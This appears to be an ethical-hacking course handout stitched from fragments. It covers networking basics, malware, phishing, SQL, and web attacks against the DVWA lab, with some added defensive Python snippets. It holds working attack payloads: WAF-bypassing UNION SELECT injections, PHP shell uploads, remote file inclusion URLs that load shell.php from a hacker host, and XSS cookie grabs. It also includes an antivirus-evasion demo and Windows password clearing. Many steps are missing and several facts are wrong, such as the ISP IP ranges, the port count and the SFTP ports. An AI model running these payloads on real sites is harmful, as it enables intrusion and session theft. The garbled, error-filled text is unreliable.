2. Global IP or Public IP: the IP address provided by DHCP to the host when it
gets connected to the internet. A global IP is not a static IP, i.e. it changes every time
you connect to the internet.
(source: www.wikipedia.com)
Examples of Global IP are:
Airtel: 122.0.0.1-122.255.255.254
BSNL: 57.0.0.1-57.255.255.254
Vodafone: 1.0.0.1-1.255.255.254
Tata: 14.0.0.1-14.255.255.254
Reliance: 112.0.0.0-112.255.255.255
IP VERSIONS:
There are two versions of IP:
IPv4: In IPv4 an address consists of 32 bits, which limits the address
space to 4294967296 (2^32) possible unique addresses. IPv4 reserves some addresses for
special purposes such as private networks, i.e. 18 million addresses, or multicast
addresses, i.e. 270 million addresses.
IPv4 addresses are canonically represented in dot-decimal notation, which consists of
four decimal numbers, each ranging from 0 to 255, separated by dots, e.g.,
172.16.254.1. Each part represents a group of 8 bits of the address. In some cases of
technical writing, IPv4 addresses may be presented in various hexadecimal, octal,
or binary representations.
IPv6: This new generation of the Internet Protocol was eventually named Internet
Protocol version 6 (IPv6) in 1995. The address size was increased from 32 to
128 bits (16 octets), thus providing up to 2^128 addresses. This is deemed sufficient for the
foreseeable future.
(source: www.wikipedia.com)
IP SUBNETTING:
A subnetwork, or subnet, is a logical, visible subdivision of an IP network. The practice
of dividing a network into two or more networks is called subnetting. Computers that
belong to a subnet are addressed with a common, identical, most-significant bit-group
in their IP address. This results in the logical division of an IP address into two fields, a
network or routing prefix and the rest field or host identifier. The rest field is an
identifier for a specific host or network interface. IP subnetting is of two types, i.e. IPv4
and IPv6.
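The prefix/host split and the subnetting step described above, worked through with the standard library (an added example, not part of the original notes; the address 172.16.254.1 comes from the IPv4 paragraph, the other networks are constructed):

```python
import ipaddress

def describe_subnet(cidr):
    """Split an address/prefix such as 172.16.254.1/24 into the two fields the
    text describes: the network (routing) prefix and the host-identifier range."""
    net = ipaddress.ip_network(cidr, strict=False)   # strict=False: host bits allowed
    if net.version == 4 and net.prefixlen <= 30:
        # Conventional IPv4 subnet: network and broadcast addresses are not usable hosts.
        first, last = net.network_address + 1, net.broadcast_address - 1
        usable = net.num_addresses - 2
    else:
        # /31, /32 and IPv6: every address in the block is addressable.
        first, last = net.network_address, net.broadcast_address
        usable = net.num_addresses
    return {
        "network": str(net.network_address),
        "prefixlen": net.prefixlen,
        "netmask": str(net.netmask),
        "broadcast": str(net.broadcast_address),
        "first_host": str(first),
        "last_host": str(last),
        "usable_hosts": usable,
    }

def same_subnet(addr_a, addr_b, prefixlen):
    """True when both addresses share the same most-significant prefixlen bits,
    i.e. the 'common, identical, most-significant bit-group' of the text."""
    a, b = ipaddress.ip_address(addr_a), ipaddress.ip_address(addr_b)
    if a.version != b.version:
        return False
    shift = a.max_prefixlen - prefixlen
    return (int(a) >> shift) == (int(b) >> shift)

def split_subnet(cidr, new_prefixlen):
    """Divide one network into equal smaller subnets (the subnetting step itself)."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [str(s) for s in net.subnets(new_prefix=new_prefixlen)]
```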
DHCP
The Dynamic Host Configuration Protocol (DHCP) provides configuration parameters to
Internet hosts. DHCP consists of two components: the first is a protocol for delivering
host-specific configuration parameters from a DHCP server to a host, and the second is a
mechanism for allocating network addresses to hosts.
Working of DHCP: DHCP assigns the IP address by taking the IP pool table length
and capacity into account in the process. It provides the LAN IP address to the computer which is
connecting to the internet. Every time the computer connects to the internet, DHCP assigns
a different IP address to the computer.
(source: www.mywindows.com)
INTRODUCTION TO PORTS
These are the doors of your devices, which can be tangible or intangible in nature, and which
are responsible for the inlet and outlet of data through the system.
Examples:-
HTTP : 80,8080
HTTPS: 443
SMTP : 25
VOIP : RANDOM
FTP : 21
SFTP : 19, 20
POP3 : 110
The ports above are pre-reserved ports, but there are in total 65336 virtual ports on our
computer.
Source: -Wikipedia
Proxy Servers: These are the dummy servers which are designed to change
your online identity and present a false identity on the internet. These servers basically
use the IP address of another country to break restrictions or to hide the user's
identity. Proxy servers also provide a basic, low-level layer of security for your internet surfing.
2. Client Based Proxy Servers: These are the proxy servers which we usually use
to change our identity online and give it security.
1. Web Based Proxy Servers: These are the proxy servers which change your
identity only in that particular browser window.
For Example:
www.kproxy.com
www.freeproxyserver.ca
www.ninjaproxy.com
Source: wikipedia
VPN: A virtual private network (VPN) extends a private network across a public
network, such as the Internet. It enables users to send and receive data across
shared or public networks as if their computing devices were directly connected to
the private network, and thus benefit from the functionality, security and
management policies of the private network. A VPN is created by establishing a
virtual point-to-point connection through the use of dedicated connections, virtual
tunnelling protocols, or traffic encryption.
For Example: -
Cyber Ghost
Hotspot Security Shield
Freegate
Browser Extension: There are some browser extensions we can also use to hide
our identity.
For Example: -
DOT VPN
Frontend: Basically frontends are the presentation layer between the user and the
backend technologies. Linux based frontends are Apache and Tomcat (PHP). Windows
based frontends are IIS (Internet Information Services) (ASP, ASPX).
www.whois.domaintools.com
www.whois.com
Domain Id
Registrant Email
Registrant Id
IP location
Server type etc.
www.yougetsignal.com
It can be done with software like SoftPerfect Network Scanner or
Angry IP Scanner.
Intelligent Information Gathering: It is the type of information gathering
which collects deeper information about the target/victim computer.
This information consists of:
1. Operating System
2. Open, Closed and Filtered Ports
3. Services Running on Open Ports
4. Version of the services or applications running on open ports.
It can be done through Kali Linux with software like nmap or zenmap.
Requirement:-
1.HirenBootCD
2.Blank CD or 1 GB Pendrive
Steps:-
3. Then turn on your PC into BIOS mode, usually by pressing F2 (on some computers
it may be different, like F8, F10 or DEL).
4. After going to BIOS mode, change the boot priority.
12. Select the option "Search for SAM database(s) on all hard disks and logical drives".
13. In the next step press Enter and select your user name from the list.
14. Select "Clear the user's password" and press Y to save.
INTRODUCTION TO MALWARES
Malware refers to malicious programs in the computer used to disrupt
computer operations, access sensitive information, gain unauthorized access to the
computer, etc. These are of many types:
(www.wikipedia.com)
3. Trojans: These are the RATs (Remote Administration Tools); once your
computer is infected with the Trojan it can be controlled remotely from
anywhere in the world. Hence an attacker can control the entire hardware capacity
and bandwidth of your computer from anywhere in the world.
There are two types of Trojans:
Direct Trojans: In this type of Trojan, once any computer is infected it
will not send the access to the attacker, hence the attacker has to know the IP
address of the computer which is infected.
(www.wikipedia.com)
4. Rootkits: These are add-ons to viruses and other malware code which
give shelter to the code to make it invisible to all kinds of anti-virus, IDS
(Intrusion Detection System) and IPS (Intrusion Prevention System) systems.
These are designed to enable access to a computer or areas of its software that
would not otherwise be allowed (for example, to an unauthorized user) while at
the same time masking its existence or the existence of other software.
(www.pcworld.com)
6. Spyware: Spyware consists of scripts which steal credentials via a web
browser and send the details to the attacker. It can also be used to spy on the victim,
extract secret details and send them back to the attacker.
7. Adware: These are the websites from which people raise huge money
through advertisement. They are designed to generate huge money from Google AdSense
by infecting websites and showing their advertisements on websites and in
software when you install it without reading and selecting the options.
If they don’t pay after 48 hours all files will be shredded and then deleted.
(www.pcworld.com)
Evading Antivirus
When we hear the word virus our mind thinks about antivirus. Antivirus can save us from
low-level viruses which are fully detectable. Even paid or premium antiviruses can't save
us from a FUD (Fully Undetectable) virus. Criminals make a virus FUD in nature by using some
tools. In this demo we can see how easily antiviruses are bypassed.
1. First we created a Trojan, then we tested that virus on a site called
www.virustotal.com
2. In this picture we can see that out of 54 antiviruses, 50 flagged it as a virus.
5. This time there are only 29 antiviruses that flag it as a virus. So from this demo we can see
how easily antiviruses are bypassable.
Phishing Attack
An attempt to acquire information such as usernames, passwords, and credit card
details by masquerading as a trustworthy entity in an electronic communication.
Whaling: -Several recent phishing attacks have been directed specifically at senior
executives and other high profile targets within businesses, and the term whaling has
been coined for these kinds of attacks. In the case of whaling, the masquerading web
page/email will take a more serious executive-level form. The content will be crafted to
target an upper manager and the person's role in the company. The content of a
whaling attack email is often written as a legal subpoena, customer complaint, or
executive issue. Whaling scam emails are designed to masquerade as a critical business
email, sent from a legitimate business authority. The content is meant to be tailored for
upper management, and usually involves some kind of falsified company-wide concern.
Whaling phishermen have also forged official-looking FBI subpoena emails, and claimed
that the manager needs to click a link and install special software to view the subpoena.
Source
SOCIAL ENGINEERING
Social Engineering (SE) is a blend of science, psychology and art. While it is amazing
and complex, it is also very simple. Unlike hacking, social engineering is basically done
through the social skills of a person. In this type of engineering all the information is accessed
with the permission of the user. It can also be defined as “Any act that influences a person
to take an action that may or may not be in their best interest.” It consists of many
types:
1. Baiting
Baiting involves dangling something you want to entice you to take an action the criminal
desires. It can be in the form of a music or movie download on a peer-to-peer site, or it can
be a USB flash drive with a company logo labelled “Executive Salary Summary Q1 2013” left
out in the open for you to find. Then, once the device is used or downloaded, the person or
company’s computer is infected with malicious software allowing the criminal to advance
into your system.
2. Phishing
Phishing involves false emails, chats, or websites designed to impersonate real systems with
the goal of capturing sensitive data. A message might come from a bank or other well
known institution with the need to “verify” your login information. It will usually be a self-
made (fake) login page with all the right logos to look legitimate. It could also be a message
claiming you are the “winner” of some prize or lottery with a request to hand over your
bank information.
3. Pretexting
Pretexting is the human equivalent of phishing, where someone acts as an authority figure
or someone you trust to gain access to your login information. It can take the form of fake IT
support needing to do maintenance, or a false investigator performing a company audit.
Someone might impersonate co-workers, the police, tax authorities or other seemingly
legitimate people in order to gain access to your computer and information.
Email Encryption
Internet technology has many flaws, loopholes and bugs. A cyber criminal can easily hack
into your email account by many methods like social engineering, keyloggers etc. You can
protect yourself from hackers, even after they have hacked into your account, by using email encryption.
You just have to set a private key that encrypts your whole message. If someone wants to
read your original message, that email message has to be decrypted with the
private key which you set before you sent the message. Software that we can use
to encrypt our emails:
Source
SQL Basics
SQL: Structured Query Language is a special-purpose programming language
designed for managing data held in a relational database management system (RDBMS),
or for stream processing in a relational data stream management system (RDSMS). Source
Some of The Most Important SQL Commands
1.SELECT
Syntax
2. DISTINCT
In a table, a column may contain many duplicate values; and sometimes you only want
to list the different (distinct) values.
The DISTINCT keyword can be used to return only distinct (different) values.
Syntax
3. WHERE
The WHERE clause is used to extract only those records that fulfill a specified criterion.
Syntax
SELECT column_name,column_name
FROM table_name
WHERE column_name operator value;
4. And & OR
The AND operator displays a record if both the first condition AND the second condition are true.
The OR operator displays a record if either the first condition OR the second condition is true.
AND Syntax
OR Syntax
5. Order By
The ORDER BY keyword is used to sort the result-set by one or more columns. The
ORDER BY keyword sorts the records in ascending order by default. To sort the records
in descending order, you can use the DESC keyword.
Syntax
6. Insert Into
Syntax
7. Update
UPDATE table_name
SET column1=value1,column2=value2,...
WHERE some_column=some_value;
8. Delete
Syntax
9. Injection
SQL injection is a technique where malicious users can inject SQL commands into an SQL
statement via web page input. Injected SQL commands can alter the SQL statement and
compromise the security of a web application.
The SELECT TOP clause is used to specify the number of records to return.
The SELECT TOP clause can be very useful on large tables with thousands of records.
Returning a large number of records can impact on performance.
Syntax
13. Like
Syntax
SELECT column_name(s)
FROM table_name
WHERE column_name LIKE pattern;
14. Wildcards
In SQL, wildcard characters are used with the SQL LIKE operator. SQL wildcards are used
to search for data within a table.
Wildcard Description
% A substitute for zero or more characters
_ A substitute for a single character
[charlist]
Syntax
15. IN
Syntax
SELECT column_name(s)
FROM table_name
WHERE column_name IN (value1,value2,...);
16. Between
The BETWEEN operator selects values within a range. The values can be numbers, text, or dates.
Syntax
SELECT column_name(s)
FROM table_name
WHERE column_name BETWEEN value1 AND value2;
18. Aliases
SQL aliases are used to give a database table, or a column in a table, a temporary name.
Basically aliases are created to make column names more readable.
Syntax
19. Union
The UNION operator is used to combine the result-set of two or more SELECT
statements.
Notice that each SELECT statement within the UNION must have the same number of
columns. The columns must also have similar data types. Also, the columns in each
SELECT statement must be in the same order.
Syntax
The SELECT INTO statement selects data from one table and inserts it into a new table.
Syntax
SELECT *
INTO newtable [IN externaldb]
FROM table1;
The INSERT INTO SELECT statement selects data from one table and inserts it into an
existing table. Any existing rows in the target table are unaffected.
Syntax
We can copy all columns from one table to another, existing table:
22. Create DB
Syntax
Tables are organized into rows and columns; and each table must have a name.
Syntax
24.CHECK
The CHECK constraint is used to limit the value range that can be placed in a column.
If you define a CHECK constraint on a single column it allows only certain values for this
column.
If you define a CHECK constraint on a table it can limit the values in certain columns
based on values in other columns in the row.
25. Index
An index can be created in a table to find data more quickly and efficiently.
The users cannot see the indexes, they are just used to speed up searches/queries.
Syntax
26. Drop
The DROP INDEX statement is used to delete an index in a table.
Syntax
27. Alter
The ALTER TABLE statement is used to add, delete, or modify columns in an existing
table.
Syntax
CREATE TABLE Persons
(
ID int NOT NULL AUTO_INCREMENT,
LastName varchar(255) NOT NULL,
FirstName varchar(255),
Address varchar(255),
City varchar(255),
PRIMARY KEY (ID)
)
29. Views
Syntax
Syntax
Source
SQL Injection
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause
repudiation issues such as voiding transactions or changing balances, allow the
complete disclosure of all data on the system, destroy the data or make it otherwise
unavailable, and become administrators of the database server.
Source
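The injection described above, reproduced against an in-memory SQLite table so the vulnerable query can be compared with its parameterized fix (an added example, not DVWA's code; the users table and its rows are constructed to resemble the DVWA target, not copied from it):

```python
import sqlite3

# Constructed sample data standing in for the DVWA users table (not the real schema).
SAMPLE_USERS = [
    (1, "admin", "Admin", "Istrator"),
    (2, "gordonb", "Gordon", "Brown"),
    (3, "1337", "Hack", "Me"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT,"
                 " first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn

def lookup_vulnerable(conn, user_id):
    # Deliberately vulnerable: the untrusted id is spliced into the SQL text,
    # which is the pattern behind the ?id=2' probe in the notes.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    # Hardened: the id travels as a bound parameter and can never become SQL syntax.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

def outcome(lookup, user_id):
    """Classify what one request produced: the number of rows returned, or
    'error' when the database rejected the statement (the syntax error that a
    lone quote triggers and that error based injection relies on)."""
    conn = make_db()
    try:
        return len(lookup(conn, user_id))
    except sqlite3.OperationalError:
        return "error"
    finally:
        conn.close()
```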
First we have to set up the XAMPP server and copy our DVWA framework
folder to the htdocs folder of the XAMPP installation directory. After moving the folder to the XAMPP
folder, start XAMPP's Apache and MySQL servers. After all these steps, visit
your localhost and add the folder's directory to the URL. Now your DVWA framework is configured
for work.
Target: http://127.0.0.1/dvwa/vulnerabilities/sqli/
http://127.0.0.1/dvwa/vulnerabilities/sqli/
GET : .php?id=10
POST: .php
Users
2 Giorden Brown
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2'&Submit=Submit#
Step 3: Count the total number of columns in the respective URL table.
Step 4:Dump the DDL of the table's columns for custom query execution.
Table: information_schema.tables
Columns :information_schema.columns
Target : users
--------
Organisation
a = alpha
a = char
apple = word
apple = string
users --> string ????
Step 1: Find any GET parameter in the URL of the website, i.e. we have to look for any
Something=Something.
http://testasp.vulneb.com/showforum.asp?id=0
Note: Error based injection works on the LIFO rule: Last In, First Out.
For Example: If we have a database with tables like followings
threads -> 1
teacher->2
classes->3
fee->4
users->5
uname:admin
upass: none
Google Dorks
Google Dork or Google Hacking means using some advanced Google search filters to find
a specific result. Hackers use these filters to find unexpectedly exposed data like SQL
admin, credit card numbers etc.
History of Google Dorks: The concept of "Google Hacking" dates back to 2002,
when Johnny Long began to collect interesting Google search queries that uncovered
vulnerable systems and/or sensitive information disclosures, labeling them Google
Dorks.
The list of Google Dorks grew into a large dictionary of queries, which were eventually
organized into the original Google Hacking Database (GHDB) in 2004. These Google
hacking techniques were the focus of a book released by Johnny Long in 2005, called
Google Hacking for Penetration Testers, Volume 1. Since its heyday, the concepts
explored in Google Hacking have been extended to other search engines, such as Bing
and Shodan. Automated attack tools use custom search dictionaries to find vulnerable
systems and sensitive information disclosures in public systems that have been indexed
by search engines.
But in 2012 Google held an open challenge for anyone to infiltrate their resisting
servers. For a full visual timeline, detailing the major events and developments in
Google Hacking from 2002 to present, see the Google Hacking History by Bishop Fox.
History Source
IPS: Intrusion Prevention System: Again it works on a black list coupled with a large
database of attack patterns; if anyone in the network applies an attack which matches the
database of attacks, the IPS will block the request and hence that IP again cannot communicate in
the same network, i.e. it becomes a blacklisted IP address.
Web Application Firewall: When a web site owner deploys an application software
containing all kinds of attack database in it and filters the requests sent by the
visitor, then we can say that the application which is deployed on the website is a web
application firewall.
Types of WAF
1. Software WAF: These are the firewall technologies which, just like a software
application, can be installed on the web server and hence can be used to filter the
requested contents.
2. Hardware WAF: These are the UTM systems (Unified Threat Management Systems), i.e.
they contain Antivirus + Firewall + IDS and IPS + Web Filtering for Content etc.
Mod Security: Mod Security came into the picture in early 2008 when hackers were at their peak
and defacing websites all over the world. This was the era when there were many paid firewalls
but there was no solution for the middle level organisations.
Mod Security came and gave a little hope to web site owners that they would be protected from
hackers.
Problems
Every WAF works on two principal formats: first White List and then Black List filtration.
1. White List: When we declare that the owner must only login from a certain static
IP as well as MAC address and username and password. Hence even if the password gets
leaked no one can login to the website unless he is on the same IP and MAC address.
2. Black List: It's the second way of securing the website, hence it will have a
database of all the nonsense attacks, especially string based ones (order by), (union all select)
etc. Hence any request carrying this kind of string from a VISITOR will get filtered
by the blacklist and the response will be blocked if it matches any string from the list.
sudo gedit /etc/apache2/sites-available/000-default.conf
After opening this file, i.e. 000-default.conf, we have to change the IP address of the server
or the website name whose traffic we want to filter with mod security.
Inline Comments : /* */
/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/
Step 3: http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1'
/*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,column_name from
information_schema.columns where table_name='users'--+&Submit=Submit#
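Why the inline-comment form above slips past a plain blacklist, and what a filter has to do about it (an added example, not ModSecurity's own rules or code): a naive substring match is compared with one that first normalizes the query the way the database will read it, by URL-decoding and unwrapping /*!50000 ... */ version comments. The blocked phrases and the sample requests are constructed from the strings in the notes.

```python
import re
from urllib.parse import unquote_plus

# The string based signatures the notes mention (constructed list).
BLOCKED_PHRASES = ("union all select", "union select", "order by")

def naive_blacklist(raw_query):
    """Substring match on the raw request: this is the filter the comment trick defeats."""
    q = raw_query.lower()
    return any(p in q for p in BLOCKED_PHRASES)

def normalize(raw_query):
    """Rewrite the request into the form MySQL will actually execute:
    '+' and %xx decoded, /*!50000 word */ unwrapped to its body, ordinary
    comments dropped, whitespace collapsed, case folded."""
    s = unquote_plus(raw_query)
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)   # keep body of version comments
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)             # drop plain comments
    s = re.sub(r"\s+", " ", s)
    return s.strip().lower()

def normalized_blacklist(raw_query):
    """Same signatures, but matched against the normalized statement."""
    return any(p in normalize(raw_query) for p in BLOCKED_PHRASES)

# Constructed sample requests, modelled on the two forms shown in the notes.
RAW_PLAIN = "1' union all select 1,column_name from information_schema.columns"
RAW_OBFUSCATED = ("1'/*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,column_name from "
                  "information_schema.columns where table_name='users'--+")
```

Blacklists stay fragile even after normalization; the check is a detection aid, not a substitute for parameterized queries.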
Honeypots
Honeypots are traps deployed by web developers in which hackers try to attack,
and the honeypot logs the IP and cookies of the hackers for further law enforcement
activities.
Types of HoneyPots
1. Production HoneyPot: These are the middle level honeypots deployed by the middle
level organisations as they are cheap in price, easy to deploy and easy to monitor. But they
come up with only a simple report as outcome.
2. Research Honeypot: These are developed by government agencies for research purposes
or national security, hence they are deployed on sites like nuclear power plants, oil
pipeline framework controls etc. Research honeypots are very expensive in nature, and also give
very extensive information about any mishap that occurred, which is very difficult
to understand and monitor as well.
Blind injection
Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that
asks the database true or false questions and determines the answer based on the
application's response. This attack is often used when the web application is configured
to show generic error messages, but has not mitigated the code that is vulnerable to
SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error
messages from the database complaining that the SQL Query's syntax is incorrect. Blind
SQL injection is nearly identical to normal SQL Injection, the only difference being the
way the data is retrieved from the database. When the database does not output data
to the web page, an attacker is forced to steal data by asking the database a series of
true or false questions. This makes exploiting the SQL Injection vulnerability more
difficult, but not impossible.
3. You cannot dump the entire database by interacting with it through the control panel.
5. You cannot see the other websites' code and other stuff which are on the same server
on which your website is hosted.
2. If the server has 777 permissions then you can even traverse the entire server HDD and
access other websites' data too and damage the same.
3. You can dump the entire database once you have started interaction with the machines.
MAC/Linux : terminal
www.rahul.com/hello/main/test/etc/regular/www/upload.php
- Upload images
- Upload your CV
Step 3: According to the technology and web server support we will upload our control
panel, i.e. the hacker's control panel, on the website.
For Example: If there is an option for uploading a .jpg file you can still upload a pdf
file, and if you can upload a pdf file you can also upload your php shell file.
www.xyz.com/images/hack.php
Tough Uploading: When the web developer deploys a static validation that only this type of file
format can be uploaded.
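What a "tough" upload validation looks like on the server side (an added example, not code from the notes or any framework): the declared extension is checked against a whitelist, the file header is checked against that type, server-side script markers are rejected, and the file is stored under a random name so the original name never reaches the web root. The allowed types and magic bytes are constructed for the example.

```python
import os
import secrets

# Constructed whitelist: allowed extension -> file signatures that type must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "pdf": (b"%PDF-",),
}
# Markers that indicate server-side code regardless of the claimed type.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%")

def validate_upload(filename, content):
    """Return (ok, reason); ok is True only when the file may be stored."""
    base = os.path.basename(filename)
    if not base or base != filename:
        return False, "path component in file name"
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed"
    if not any(content.startswith(sig) for sig in ALLOWED[ext]):
        return False, "content does not match declared type"
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "embedded server-side code"
    return True, "ok"

def storage_name(ext):
    """Random name with the validated extension; the client's name is discarded,
    so tricks like shell.php.jpg never produce an executable path."""
    return f"{secrets.token_hex(16)}.{ext}"

# Constructed sample uploads.
GOOD_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
FAKE_JPEG = b"<?php echo 1; ?>"
```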
Manual vulnerability auditing of all your web applications is complex and time
consuming, since it generally involves processing a large volume of data. It also demands
a high level of expertise and the ability to keep track of considerable volumes of code
used in a web application. In addition, hackers are constantly finding new ways to
exploit your web application, which means that you would have to constantly monitor
the security communities, and find new vulnerabilities in your web application code
before hackers discover them.
Mainly Burp Suite contains a large number of attacks and is highly popular due to POST
parameter discovery.
Instead of looking for vulnerable parameters one by one on the page, we will scan the
entire website and will extract all possible GET and POST hidden parameters which may
or may not be exploitable.
History
Burp Suite comes from a company known as PortSwigger, which mainly works
as a VA tool development organization with respect to the OWASP Top 10 standards.
Mainly this attack is deployed via a technology known as CrossFire technology from
AMD or SLI technology from NVIDIA.
This makes it possible to run two or more graphics cards at the same time to execute the
brute forcing process, hence with more core speed via the graphics cards it gives a
much more stable speed and results in a quick manner as compared to a computer with a simple CPU.
It’s an attack in which we try to execute certain files by including these files in an outdated CSS part of
the website known as the include function.
This include function accepts any kind of executable code file from any untrusted source and includes the
same code in the existing page on which the include function is deployed.
www.bank.com/load.html?include=http://www.hi.com/rs.jsp
RFI Shell
www.bank.com/load.html?include=www.hacker.com/shell.php
When any website gives you an interaction point to execute a certain level of shell
based commands through the application layer then we can say the website is vulnerable to a
command execution vulnerability.
It is concerned with the behaviour of the web pages depending upon the user inputs. Mainly
deployed on dynamic web pages for validation purposes.
For Example: A simple JavaScript code can be deployed to execute a client side
validation, checking the input for SQL injection.
Syntax:
<script> ---> Starting Tag
Alert: This function is used to draw a pop up box known as a dialogue box. Whatever
body content of the function is written into it, it will show as text on the box.
Here you can write two types of data: first string based and integer.
<script>alert("Welcome to Site")</script>
Prompt: It is the same as alert but also gives a text field to write your own text. But it will
not affect the working of the pop up, hence it only has the read only property.
<script>prompt("hi")</script>
Every website contains a cookie and a respective session in browser memory, hence if we are
able to get the cookie we can embed the same cookie in our browser and as we open the
same site we will enter into the same session as the victim.
<script>alert(document.cookie)</script>
Why XSS Occurs: When any website takes any kind of executable input from any
unauthorized visitor then we can say that the website is vulnerable to an XSS attack.
For Example: While shopping on Flipkart some user enters <h1>Hacked</h1> in the search
bar and as he hits search the website understands the heading tag and executes it on the main
page.
Types of XSS
1. Reflected XSS | Temp. XSS: This XSS only affects a particular user’s browser, hence it will
not remain permanent for the visitors of the website.
Attacks Possible: A criminal can add a form on the vulnerable link and send an input form
with details like Name, Credit Card no., Password, PINCODE etc. Yes, if the vulnerability is
on any banking website.
2. Stored XSS | Permanent XSS: If the input field is attached to the database then we can
say that it’s a stored XSS.
For Example: A hacker inputs malicious JavaScript code to steal the cookies of all the visitors
of the website who visit for online shopping or banking etc. It can be worse via a keylogger
too.
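The search-bar example above and the cookie-theft scenario, shown from the server's side (an added example, not the notes' own code): the reflecting page is rendered once without and once with output encoding, a small HTML parser counts which tags the browser would actually see, and the session cookie is issued with HttpOnly so document.cookie cannot read it. The inputs are the ones from the notes plus one constructed benign query.

```python
import html
from html.parser import HTMLParser

# Inputs from the notes, plus a constructed benign search term with quotes and an ampersand.
SAMPLE_INPUTS = [
    "<h1>Hacked</h1>",
    "<script>alert(document.cookie)</script>",
    'Flipkart "phones" & tablets',
]

def render_vulnerable(term):
    """Reflects the search term verbatim: the browser parses any tags in it."""
    return f"<p>Results for: {term}</p>"

def render_safe(term):
    """Reflects the term with HTML output encoding, so < > & and quotes become text."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"

class TagCollector(HTMLParser):
    """Records the start tags a browser would parse out of a fragment."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(fragment):
    collector = TagCollector()
    collector.feed(fragment)
    return collector.tags

def session_cookie_header(value):
    """Set-Cookie value for the session: HttpOnly keeps it out of document.cookie,
    Secure limits it to HTTPS, SameSite=Lax limits cross-site sending."""
    return f"session={value}; HttpOnly; Secure; SameSite=Lax; Path=/"
```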
Requirements
--------------
1. Basics of HTML
2. Basics of JAVA SCRIPT
3. DVWA: Reflected + Stored (Low + Medium)
Source
Missing Functional Level Access Control
Most web applications verify function level access rights before making that
functionality visible in the UI. However, applications need to perform the same access
control checks on the server when each function is accessed. If requests are not verified,
attackers will be able to forge requests in order to access functionality without proper
authorization.
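The server-side check the paragraph calls for, as an added example (not code from the notes or any framework): a decorator enforces the role on every call of the handler from the server's own session store, so a request that merely claims admin rights in its parameters is refused whether or not the UI ever showed the function. The session store, tokens and handler are constructed.

```python
from functools import wraps

# Constructed server-side session store: the role is looked up here, never read from the request.
SESSIONS = {
    "tok-alice": {"user": "alice", "role": "admin"},
    "tok-bob": {"user": "bob", "role": "user"},
}

def requires_role(role):
    """Decorator: perform the access check on the server for every invocation of the
    handler, independent of whether the UI exposed the function."""
    def decorate(handler):
        @wraps(handler)
        def guarded(request):
            session = SESSIONS.get(request.get("session_token"))
            if session is None:
                return 401, "login required"
            if session["role"] != role:
                return 403, "forbidden"
            return handler(request, session)
        return guarded
    return decorate

@requires_role("admin")
def delete_user(request, session):
    """Admin-only function; only reached after the decorator's check passed."""
    return 200, f"{session['user']} deleted {request['params']['target']}"

def forged_request(token, target):
    """A request that asserts admin rights in its own parameters, the kind of forgery the
    paragraph describes; the server ignores that claim and trusts only the session."""
    return {"session_token": token, "params": {"target": target, "role": "admin"}}
```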
Source
LINUX BASICS
1.Command: ls
The command “ls” stands for (List Directory Contents), List the contents of the folder, be
it file or folder, from which it runs.
root@tecmint:~# ls
Android-Games Music
Pictures Public
Desktop Tecmint.com
Documents TecMint-Sync
Downloads Templates
The command “ls -l” lists the content of a folder, in long listing fashion.
root@tecmint:~# ls -l
total 40588
Command “ls -a“ lists the content of a folder, including hidden files starting with ‘.’.
root@tecmint:~# ls -a
. .gnupg .dbus
.goutputstream-PI5VVW .mission-control
2.Command: lsblk
The “lsblk” command stands for (List Block Devices); it prints block devices by their assigned name
(but not RAM) on the standard output in a tree-like fashion.
root@tecmint:~# lsblk
The “lsblk -l” command lists block devices in ‘list‘ structure (not tree-like fashion).
root@tecmint:~# lsblk -l
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
Note: lsblk is a very useful and the easiest way to know the name of a new USB device you just
plugged in, especially when you have to deal with disks/blocks in the terminal.
3.Command: md5sum
The “md5sum” command stands for (Compute and Check MD5 Message Digest). An md5 checksum
(commonly called a hash) is used to match or verify the integrity of files that may have
changed as a result of a faulty file transfer, a disk error or non-malicious interference.
Note: The user can match the generated md5sum with the one provided officially.
md5sum is considered less secure than sha1sum, which we will discuss later.
4.Command: dd
Command “dd” stands for (Convert and Copy a file). It can be used to convert and copy a
file and most of the time is used to copy an iso file (or any other file) to a USB device (or
any other location), thus it can be used to make a ‘Bootable‘ USB stick.
Note: In the above example the USB device is supposed to be sdb1 (you should verify it
using the command lsblk, otherwise you will overwrite your disk and OS); use the name of the disk
very cautiously!
The dd command takes some time, ranging from a few seconds to several minutes, in
execution, depending on the size and type of file and the read and write speed of the USB stick.
5.Command: uname
The “uname” command stands for (Unix Name); it prints detailed information about the
machine name, Operating System and Kernel.
root@tecmint:~# uname -a
Linux tecmint 3.8.0-19-generic #30-Ubuntu SMP Wed May 1 16:36:13 UTC 2013 i686 i686 i686 GNU/Linux
Note: uname shows the type of kernel. uname -a outputs detailed information. Elaborating
the above output of uname -a:
1. “Linux“: The machine’s kernel name.
2. “tecmint“: The machine’s node name.
